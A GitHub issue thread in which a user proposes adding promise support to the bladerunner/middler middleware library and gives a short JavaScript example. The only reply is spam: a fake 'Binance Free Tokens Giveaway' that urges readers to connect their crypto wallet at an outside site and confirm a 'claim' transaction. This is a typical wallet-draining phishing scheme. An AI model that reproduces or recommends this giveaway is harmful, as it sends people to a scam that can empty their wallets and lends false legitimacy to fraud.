### ISSUE TITLE
Add promise support

### ISSUE THREAD

**Issue by meaku** [carlos8f/bladerunner#1]
Hey @carlos8f, 

what do you think of promise support for bladerunner / middler?
We are using promises a lot lately and using them for middleware and route handlers would be great. 

``` javascript
middler
  .add(function(req, res) {
     it(!req.params.id) {
         return when.reject(new Error("Params has to be defined");
     }
     return when.resolve(); 
  }) 
  .add(function(req, res) {
      return db.loadModel(req.params.id).then(function(model) {
         req.model = model;
      });
      //err would automatically be handled by middler
  })
  .add(function(req, res) {
     res.send(req.model);
  });
```

If you like the idea i could open a pull request. 
Maybe using promises in route handlers is a bit to late with generators kicking in, but it still think promises are a great way to handle async stuff.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
